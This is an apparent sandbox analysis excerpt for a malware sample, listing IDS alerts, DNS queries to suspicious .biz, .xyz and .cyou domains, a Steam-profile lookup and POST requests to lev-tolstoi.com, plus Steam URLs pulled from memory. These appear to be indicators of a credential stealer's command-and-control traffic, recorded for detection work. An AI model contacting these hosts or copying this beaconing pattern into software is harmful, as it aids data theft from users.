      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49705 -> 23.55.153.106:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49707 -> 172.67.157.254:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49706 -> 172.67.157.254:443
      Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: lev-tolstoi.com
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
      Source: 3zg6i6Zu1u.exe, 00000000.00000003.1521087549.0000000000A2E000.00000004.00000020.00020000.00000000.sdmp, 3zg6i6Zu1u.exe, 00000000.00000003.1520896287.0000000000A2E000.00000004.00000020.00020000.00000000.sdmp, 3zg6i6Zu1u.exe, 00000000.00000003.1510745566.0000000000A2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com equals www.youtube.com (Youtube)
      Source: global trafficDNS traffic detected: DNS query: spellshagey.biz
      Source: global trafficDNS traffic detected: DNS query: immureprech.biz
      Source: global trafficDNS traffic detected: DNS query: deafeninggeh.biz
      Source: global trafficDNS traffic detected: DNS query: effecterectz.xyz
      Source: global trafficDNS traffic detected: DNS query: diffuculttan.xyz
      Source: global trafficDNS traffic detected: DNS query: debonairnukk.xyz
      Source: global trafficDNS traffic detected: DNS query: wrathful-jammy.cyou
      Source: global trafficDNS traffic detected: DNS query: awake-weaves.cyou
      Source: global trafficDNS traffic detected: DNS query: sordid-snaked.cyou
      Source: global trafficDNS traffic detected: DNS query: steamcommunity.com
      Source: global trafficDNS traffic detected: DNS query: lev-tolstoi.com
      Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: lev-tolstoi.com
      Source: 3zg6i6Zu1u.exe, 00000000.00000003.1510688995.0000000000A7E000.00000004.00000020.00020000.00000000.sdmp, 3zg6i6Zu1u.exe, 00000000.00000003.1521087549.00000000009F2000.00000004.00000020.00020000.00000000.sdmp, 3zg6i6Zu1u.exe, 00000000.00000003.1520896287.00000000009EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
      Source: 3zg6i6Zu1u.exe, 00000000.00000003.1510688995.0000000000A7E000.00000004.00000020.00020000.00000000.sdmp, 3zg6i6Zu1u.exe, 00000000.00000003.1521087549.00000000009F2000.00000004.00000020.00020000.00000000.sdmp, 3zg6i6Zu1u.exe, 00000000.00000003.1520896287.00000000009EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/privacy_agreement/
      Source: 3zg6i6Zu1u.exe, 00000000.00000003.1510688995.0000000000A7E000.00000004.00000020.00020000.00000000.sdmp, 3zg6i6Zu1u.exe, 00000000.00000003.1521087549.00000000009F2000.00000004.00000020.00020000.00000000.sdmp, 3zg6i6Zu1u.exe, 00000000.00000003.1520896287.00000000009EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/subscriber_agreement/
      Source: Amcache.hve.4.drString found in binary or memory: http://upx.sf.net
      Source: 3zg6i6Zu1u.exe, 00000000.00000003.1510688995.0000000000A7E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.valvesoftware.com/legal.htm
      Source: 3zg6i6Zu1u.exe, 00000000.00000003.1510688995.0000000000A7E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://avatars.fastly.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
      Source: 3zg6i6Zu1u.exe, 00000000.00000003.1521087549.0000000000A2E000.00000004.00000020.00020000.00000000.sdmp, 3zg6i6Zu1u.exe, 00000000.00000003.1520896287.0000000000A2E000.00000004.00000020.00020000.00000000.sdmp, 3zg6i6Zu1u.exe, 00000000.00000003.1510745566.0000000000A2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://broadcast.st.dl.eccdnx.com
      Source: 3zg6i6Zu1u.exe, 00000000.00000003.1510745566.0000000000A2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/
      Source: 3zg6i6Zu1u.exe, 00000000.00000003.1521087549.0000000000A2E000.00000004.00000020.00020000.00000000.sdmp, 3zg6i6Zu1u.exe, 00000000.00000003.1520896287.0000000000A2E000.00000004.00000020.00020000.00000000.sdmp, 3zg6i6Zu1u.exe, 00000000.00000003.1510745566.0000000000A2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://checkout.steampowered.com/
      Source: 3zg6i6Zu1u.exe, 00000000.00000003.1521087549.0000000000A2E000.00000004.00000020.00020000.00000000.sdmp, 3zg6i6Zu1u.exe, 00000000.00000003.1520896287.0000000000A2E000.00000004.00000020.00020000.00000000.sdmp, 3zg6i6Zu1u.exe, 00000000.00000003.1510745566.0000000000A2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.c
      Source: 3zg6i6Zu1u.exe, 00000000.00000003.1510745566.0000000000A2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/
      Source: 3zg6i6Zu1u.exe, 00000000.00000003.1510688995.0000000000A7E000.00000004.00000020.00020000.00000000.sdmp, 3zg6i6Zu1u.exe, 00000000.00000003.1521087549.00000000009F2000.00000004.00000020.00020000.00000000.sdmp, 3zg6i6Zu1u.exe, 00000000.00000003.1520896287.00000000009EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=Lj6X7NKUMfzk&a
      Source: 3zg6i6Zu1u.exe, 00000000.00000003.1521087549.0000000000A2E000.00000004.00000020.00020000.00000000.sdmp, 3zg6i6Zu1u.exe, 00000000.00000003.1510688995.0000000000A7E000.00000004.00000020.00020000.00000000.sdmp, 3zg6i6Zu1u.exe, 00000000.00000003.1520896287.0000000000A2E000.00000004.00000020.00020000.00000000.sdmp, 3zg6i6Zu1u.exe, 00000000.00000003.1510745566.0000000000A2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&l=english&_c
      Source: 3zg6i6Zu1u.exe, 00000000.00000003.1510688995.0000000000A7E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&amp
      Source: 3zg6i6Zu1u.exe, 00000000.00000003.1510688995.0000000000A7E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&l=english&a
      Source: 3zg6i6Zu1u.exe, 00000000.00000003.1510688995.0000000000A7E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&l=eng
      Source: 3zg6i6Zu1u.exe, 00000000.00000003.1510688995.0000000000A7E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&l=englis
      Source: 3zg6i6Zu1u.exe, 00000000.00000003.1510688995.0000000000A7E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
      Source: 3zg6i6Zu1u.exe, 00000000.00000003.1510688995.0000000000A7E000.00000004.00000020.00020000.00000000.sdmp, 3zg6i6Zu1u.exe, 00000000.00000003.1521087549.00000000009F2000.00000004.00000020.00020000.00000000.sdmp, 3zg6i6Zu1u.exe, 00000000.00000003.1520896287.00000000009EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
      Source: 3zg6i6Zu1u.exe, 00000000.00000003.1510688995.0000000000A7E000.00000004.00000020.00020000.00000000.sdmp, 3zg6i6Zu1u.exe, 00000000.00000003.1521087549.00000000009F2000.00000004.00000020.00020000.00000000.sdmp, 3zg6i6Zu1u.exe, 00000000.00000003.1520896287.00000000009EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
      Source: 3zg6i6Zu1u.exe, 00000000.00000003.1510688995.0000000000A7E000.00000004.00000020.00020000.00000000.sdmp, 3zg6i6Zu1u.exe, 00000000.00000003.1521087549.00000000009F2000.00000004.00000020.00020000.00000000.sdmp, 3zg6i6Zu1u.exe, 00000000.00000003.1520896287.00000000009EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/main.js?v=_92TWn81
      Source: 3zg6i6Zu1u.exe, 00000000.00000003.1510688995.0000000000A7E000.00000004.00000020.00020000.00000000.sdmp, 3zg6i6Zu1u.exe, 00000000.00000003.1521087549.00000000009F2000.00000004.00000020.00020000.00000000.sdmp, 3zg6i6Zu1u.exe, 00000000.00000003.1520896287.00000000009EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=hyEE
      Source: 3zg6i6Zu1u.exe, 00000000.00000003.1521087549.0000000000A2E000.00000004.00000020.00020000.00000000.sdmp, 3zg6i6Zu1u.exe, 00000000.00000003.1520896287.0000000000A2E000.00000004.00000020.00020000.00000000.sdmp, 3zg6i6Zu1u.exe, 00000000.00000003.1510745566.0000000000A2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWH
      Source: 3zg6i6Zu1u.exe, 00000000.00000003.1510688995.0000000000A7E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&l=english&am
      Source: 3zg6i6Zu1u.exe, 00000000.00000003.1510688995.0000000000A7E000.00000004.00000020.00020000.00000000.sdmp, 3zg6i6Zu1u.exe, 00000000.00000003.1510745566.0000000000A2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=gQHVlrK4-jX-&l
      Source: 3zg6i6Zu1u.exe, 00000000.00000003.1510688995.0000000000A7E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=uqf5ttWTRe7l&l=engl
      Source: 3zg6i6Zu1u.exe, 00000000.00000003.1510688995.0000000000A7E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&l=english&a
      Source: 3zg6i6Zu1u.exe, 00000000.00000003.1510688995.0000000000A7E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/profile.js?v=GeQ6v03mWpAc&l=english&a
      Source: 3zg6i6Zu1u.exe, 00000000.00000003.1510688995.0000000000A7E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&l=en
      Source: 3zg6i6Zu1u.exe, 00000000.00000003.1510688995.0000000000A7E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&l=eng
      Source: 3zg6i6Zu1u.exe, 00000000.00000003.1510688995.0000000000A7E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&l=e
      Source: 3zg6i6Zu1u.exe, 00000000.00000003.1510688995.0000000000A7E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbC
      Source: 3zg6i6Zu1u.exe, 00000000.00000003.1510688995.0000000000A7E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/webui/clientcom.js?v=St3gSJx2HFUZ&l=e
      Source: 3zg6i6Zu1u.exe, 00000000.00000003.1521087549.0000000000A2E000.00000004.00000020.00020000.00000000.sdmp, 3zg6i6Zu1u.exe, 00000000.00000003.1510688995.0000000000A7E000.00000004.00000020.00020000.00000000.sdmp, 3zg6i6Zu1u.exe, 00000000.00000003.1520896287.0000000000A2E000.00000004.00000020.00020000.00000000.sdmp, 3zg6i6Zu1u.exe, 00000000.00000003.1510745566.0000000000A2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&l=english&
      Source: 3zg6i6Zu1u.exe, 00000000.00000003.1510688995.0000000000A7E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&l=engl
      Source: 3zg6i6Zu1u.exe, 00000000.00000003.1510688995.0000000000A7E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=wuA4X_n5-mo0&l=en
      Source: 3zg6i6Zu1u.exe, 00000000.00000003.1510688995.0000000000A7E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&
      Source: 3zg6i6Zu1u.exe, 00000000.00000003.1510688995.0000000000A7E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
      Source: 3zg6i6Zu1u.exe, 00000000.00000003.1510688995.0000000000A7E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_logo.png
      Source: 3zg6i6Zu1u.exe, 00000000.00000003.1510688995.0000000000A7E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
      Source: 3zg6i6Zu1u.exe, 00000000.00000003.1510688995.0000000000A7E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
      Source: 3zg6i6Zu1u.exe, 00000000.00000003.1510688995.0000000000A7E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2S&amp
      Source: 3zg6i6Zu1u.exe, 00000000.00000003.1510688995.0000000000A7E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&am
      Source: 3zg6i6Zu1u.exe, 00000000.00000003.1510688995.0000000000A7E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=tvQ
      Source: 3zg6i6Zu1u.exe, 00000000.00000003.1521087549.0000000000A2E000.00000004.00000020.00020000.00000000.sdmp, 3zg6i6Zu1u.exe, 00000000.00000003.1510688995.0000000000A7E000.00000004.00000020.00020000.00000000.sdmp, 3zg6i6Zu1u.exe, 00000000.00000003.1520896287.0000000000A2E000.00000004.00000020.00020000.00000000.sdmp, 3zg6i6Zu1u.exe, 00000000.00000003.1510745566.0000000000A2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&l=en
      Source: 3zg6i6Zu1u.exe, 00000000.00000003.1521087549.0000000000A2E000.00000004.00000020.00020000.00000000.sdmp, 3zg6i6Zu1u.exe, 00000000.00000003.1520896287.0000000000A2E000.00000004.00000020.00020000.00000000.sdmp, 3zg6i6Zu1u.exe, 00000000.00000003.1510745566.0000000000A2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/
      Source: 3zg6i6Zu1u.exe, 00000000.00000003.1510688995.0000000000A7E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/en/
      Source: 3zg6i6Zu1u.exe, 00000000.00000003.1521070628.0000000000A76000.00000004.00000020.00020000.00000000.sdmp, 3zg6i6Zu1u.exe, 00000000.00000003.1521033479.0000000000A8A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/
      Source: 3zg6i6Zu1u.exe, 00000000.00000003.1510688995.0000000000A7E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/7g
      Source: 3zg6i6Zu1u.exe, 00000000.00000003.1520896287.0000000000A2E000.00000004.00000020.00020000.00000000.sdmp, 3zg6i6Zu1u.exe, 00000000.00000002.1665581700.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 3zg6i6Zu1u.exe, 00000000.00000003.1521070628.0000000000A76000.00000004.00000020.00020000.00000000.sdmp, 3zg6i6Zu1u.exe, 00000000.00000003.1510745566.0000000000A2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/api
      Source: 3zg6i6Zu1u.exe, 00000000.00000003.1521087549.0000000000A2E000.00000004.00000020.00020000.00000000.sdmp, 3zg6i6Zu1u.exe, 00000000.00000003.1520896287.0000000000A2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/apia
      Source: 3zg6i6Zu1u.exe, 00000000.00000003.1510745566.0000000000A2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/pi
      Source: 3zg6i6Zu1u.exe, 00000000.00000003.1510745566.0000000000A2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/piGI
      Source: 3zg6i6Zu1u.exe, 00000000.00000003.1520896287.0000000000A2E000.00000004.00000020.00020000.00000000.sdmp, 3zg6i6Zu1u.exe, 00000000.00000002.1665581700.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 3zg6i6Zu1u.exe, 00000000.00000003.1521070628.0000000000A76000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/w
      Source: 3zg6i6Zu1u.exe, 00000000.00000003.1521087549.0000000000A2E000.00000004.00000020.00020000.00000000.sdmp, 3zg6i6Zu1u.exe, 00000000.00000003.1520896287.0000000000A2E000.00000004.00000020.00020000.00000000.sdmp, 3zg6i6Zu1u.exe, 00000000.00000003.1510745566.0000000000A2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.steampowered.com/
      Source: 3zg6i6Zu1u.exe, 00000000.00000003.1521087549.0000000000A2E000.00000004.00000020.00020000.00000000.sdmp, 3zg6i6Zu1u.exe, 00000000.00000003.1520896287.0000000000A2E000.00000004.00000020.00020000.00000000.sdmp, 3zg6i6Zu1u.exe, 00000000.00000003.1510745566.0000000000A2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://medal.tv
      Source: 3zg6i6Zu1u.exe, 00000000.00000003.1521087549.0000000000A2E000.00000004.00000020.00020000.00000000.sdmp, 3zg6i6Zu1u.exe, 00000000.00000003.1520896287.0000000000A2E000.00000004.00000020.00020000.00000000.sdmp, 3zg6i6Zu1u.exe, 00000000.00000003.1510745566.0000000000A2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://player.vimeo.com
      Source: 3zg6i6Zu1u.exe, 00000000.00000003.1510745566.0000000000A2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net
      Source: 3zg6i6Zu1u.exe, 00000000.00000003.1521087549.0000000000A2E000.00000004.00000020.00020000.00000000.sdmp, 3zg6i6Zu1u.exe, 00000000.00000003.1520896287.0000000000A2E000.00000004.00000020.00020000.00000000.sdmp, 3zg6i6Zu1u.exe, 00000000.00000003.1510745566.0000000000A2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net/recaptcha/;
      Source: 3zg6i6Zu1u.exe, 00000000.00000003.1510745566.0000000000A2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s.ytimg.com;
      Source: 3zg6i6Zu1u.exe, 00000000.00000003.1521087549.0000000000A2E000.00000004.00000020.00020000.00000000.sdmp, 3zg6i6Zu1u.exe, 00000000.00000003.1520896287.0000000000A2E000.00000004.00000020.00020000.00000000.sdmp, 3zg6i6Zu1u.exe, 00000000.00000003.1510745566.0000000000A2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steam.tv/
      Source: 3zg6i6Zu1u.exe, 00000000.00000003.1521087549.0000000000A2E000.00000004.00000020.00020000.00000000.sdmp, 3zg6i6Zu1u.exe, 00000000.00000003.1520896287.0000000000A2E000.00000004.00000020.00020000.00000000.sdmp, 3zg6i6Zu1u.exe, 00000000.00000003.1510745566.0000000000A2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast-test.akamaized.net
      Source: 3zg6i6Zu1u.exe, 00000000.00000003.1521087549.0000000000A2E000.00000004.00000020.00020000.00000000.sdmp, 3zg6i6Zu1u.exe, 00000000.00000003.1520896287.0000000000A2E000.00000004.00000020.00020000.00000000.sdmp, 3zg6i6Zu1u.exe, 00000000.00000003.1510745566.0000000000A2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast.akamaized.net
      Source: 3zg6i6Zu1u.exe, 00000000.00000003.1510745566.0000000000A2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/
      Source: 3zg6i6Zu1u.exe, 00000000.00000003.1510688995.0000000000A7E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
      Source: 3zg6i6Zu1u.exe, 00000000.00000003.1510688995.0000000000A7E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/discussions/
      Source: 3zg6i6Zu1u.exe, 00000000.00000003.1510688995.0000000000A7E000.00000004.00000020.00020000.00000000.sdmp, 3zg6i6Zu1u.exe, 00000000.00000003.1521087549.00000000009F2000.00000004.00000020.00020000.00000000.sdmp, 3zg6i6Zu1u.exe, 00000000.00000003.1520896287.00000000009EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
      Source: 3zg6i6Zu1u.exe, 00000000.00000003.1510688995.0000000000A7E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900
      Source: 3zg6i6Zu1u.exe, 00000000.00000003.1510688995.0000000000A7E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/market/
      Source: 3zg6i6Zu1u.exe, 00000000.00000003.1510688995.0000000000A7E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/my/wishlist/
      Source: 3zg6i6Zu1u.exe, 00000000.00000003.1510688995.0000000000A7E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/badges
      Source: 3zg6i6Zu1u.exe, 00000000.00000003.1510688995.0000000000A7E000.00000004.00000020.00020000.00000000.sdmp, 3zg6i6Zu1u.exe, 00000000.00000003.1521087549.00000000009F2000.00000004.00000020.00020000.00000000.sdmp, 3zg6i6Zu1u.exe, 00000000.00000003.1520896287.00000000009EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/inventory/
      Source: 3zg6i6Zu1u.exe, 00000000.00000003.1510688995.0000000000A7E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/workshop/
      Source: 3zg6i6Zu1u.exe, 00000000.00000003.1510688995.0000000000A7E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/
      Source: 3zg6i6Zu1u.exe, 00000000.00000003.1510688995.0000000000A7E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/about/
      Source: 3zg6i6Zu1u.exe, 00000000.00000003.1510688995.0000000000A7E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/explore/
      Source: 3zg6i6Zu1u.exe, 00000000.00000003.1510688995.0000000000A7E000.00000004.00000020.00020000.00000000.sdmp, 3zg6i6Zu1u.exe, 00000000.00000003.1521087549.00000000009F2000.00000004.00000020.00020000.00000000.sdmp, 3zg6i6Zu1u.exe, 00000000.00000003.1520896287.00000000009EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/legal/
      Source: 3zg6i6Zu1u.exe, 00000000.00000003.1510688995.0000000000A7E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/mobile
      Source: 3zg6i6Zu1u.exe, 00000000.00000003.1510688995.0000000000A7E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/news/
      Source: 3zg6i6Zu1u.exe, 00000000.00000003.1510688995.0000000000A7E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/points/shop/
      Source: 3zg6i6Zu1u.exe, 00000000.00000003.1510688995.0000000000A7E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/privacy_agreement/
      Source: 3zg6i6Zu1u.exe, 00000000.00000003.1510688995.0000000000A7E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/stats/
      Source: 3zg6i6Zu1u.exe, 00000000.00000003.1510688995.0000000000A7E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/steam_refunds/
      Source: 3zg6i6Zu1u.exe, 00000000.00000003.1510688995.0000000000A7E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/subscriber_agreement/
      Source: 3zg6i6Zu1u.exe, 00000000.00000003.1510745566.0000000000A2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.comN
      Source: 3zg6i6Zu1u.exe, 00000000.00000003.1521087549.0000000000A2E000.00000004.00000020.00020000.00000000.sdmp, 3zg6i6Zu1u.exe, 00000000.00000003.1520896287.0000000000A2E000.00000004.00000020.00020000.00000000.sdmp, 3zg6i6Zu1u.exe, 00000000.00000003.1510745566.0000000000A2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
      Source: 3zg6i6Zu1u.exe, 00000000.00000003.1510745566.0000000000A2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptcha/
      Source: 3zg6i6Zu1u.exe, 00000000.00000003.1510745566.0000000000A2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.cn/recaptcha/
      Source: 3zg6i6Zu1u.exe, 00000000.00000003.1510745566.0000000000A2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/recaptcha/
      Source: 3zg6i6Zu1u.exe, 00000000.00000003.1510688995.0000000000A7E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
      Source: 3zg6i6Zu1u.exe, 00000000.00000003.1521087549.0000000000A2E000.00000004.00000020.00020000.00000000.sdmp, 3zg6i6Zu1u.exe, 00000000.00000003.1520896287.0000000000A2E000.00000004.00000020.00020000.00000000.sdmp, 3zg6i6Zu1u.exe, 00000000.00000003.1510745566.0000000000A2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com
      Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
